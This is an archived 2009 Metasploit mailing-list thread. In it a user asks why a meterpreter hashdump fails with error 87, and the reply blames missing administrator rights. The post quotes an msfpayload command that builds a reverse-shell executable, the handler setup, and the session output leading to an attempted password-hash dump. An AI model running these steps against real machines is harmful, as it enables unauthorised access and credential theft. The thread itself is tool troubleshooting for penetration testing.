Metasploit mailing list archives
priv_passwd_get_sam_hashes: Operation failed: 87
From: egypt at metasploit.com (egypt at metasploit.com)
Date: Sun, 1 Mar 2009 18:18:40 -0700
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Are you sure the account you've compromised is an administrator? The command "use priv" will always work unless the dll required for privileged commands fails to load for some reason. If you don't have the correct privileges (i.e., administrator or SYSTEM) you'll see that error. Hope this helped, egypt -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) Comment: http://getfiregpg.org iEYEARECAAYFAkmrNA0ACgkQABHabZqEWJ0ANQCeLLZ31830QIF2/ANlNh7km512 rT4AoIPvUdP8zsPuAFbEKl4hZO9IBbDI =hMhh -----END PGP SIGNATURE----- 2009/3/1 <wfdawson at bellsouth.net>:
Hi all, I saw an older thread on this topic, but I don't see this as necessarily being directly related to that one.? First, I created a .exe: ./msfpayload windows/meterpreter/reverse_tcp LHOST=172.16.11.247 LPORT=443 Xrv_443.exeThen, I started msfconsole to receive the connection, and attempted to get the hashdump, with the resulting error: ... ?????? =[ msf v3.3-dev + -- --=[ 351 exploits - 223 payloads + -- --=[ 20 encoders - 7 nops ?????? =[ 128 aux resource> use exploit/multi/handler resource> set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp resource> set LHOST 172.16.11.247 LHOST => 172.16.11.247 resource> set LPORT 443 LPORT => 443 resource> exploit [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Starting the payload handler... [*] Transmitting intermediate stager for over-sized stage...(191 bytes) [*] Sending stage (2650 bytes) [*] Sleeping before handling stage... [*] Uploading DLL (75787 bytes)... [*] Upload completed. [*] Meterpreter session 1 opened (172.16.11.247:443 -> 67.83.150.162:50496) meterpreter > sysinfo Computer: ........... OS????? : Windows 2000 (Build 6001, Service Pack 1). meterpreter > use priv Loading extension priv...success. meterpreter > hashdump [-] priv_passwd_get_sam_hashes: Operation failed: 87 meterpreter > exit Is this result typical of Vista? _______________________________________________ http://spool.metasploit.com/mailman/listinfo/framework
Current thread:
- priv_passwd_get_sam_hashes: Operation failed: 87 wfdawson at bellsouth.net (Mar 01)
- priv_passwd_get_sam_hashes: Operation failed: 87 H D Moore (Mar 01)
- priv_passwd_get_sam_hashes: Operation failed: 87 wfdawson at bellsouth.net (Mar 02)
- priv_passwd_get_sam_hashes: Operation failed: 87 Patrick Webster (Mar 02)
- priv_passwd_get_sam_hashes: Operation failed: 87 Ron (Mar 03)
- priv_passwd_get_sam_hashes: Operation failed: 87 wfdawson at bellsouth.net (Mar 02)
- priv_passwd_get_sam_hashes: Operation failed: 87 H D Moore (Mar 01)
- priv_passwd_get_sam_hashes: Operation failed: 87 egypt at metasploit.com (Mar 01)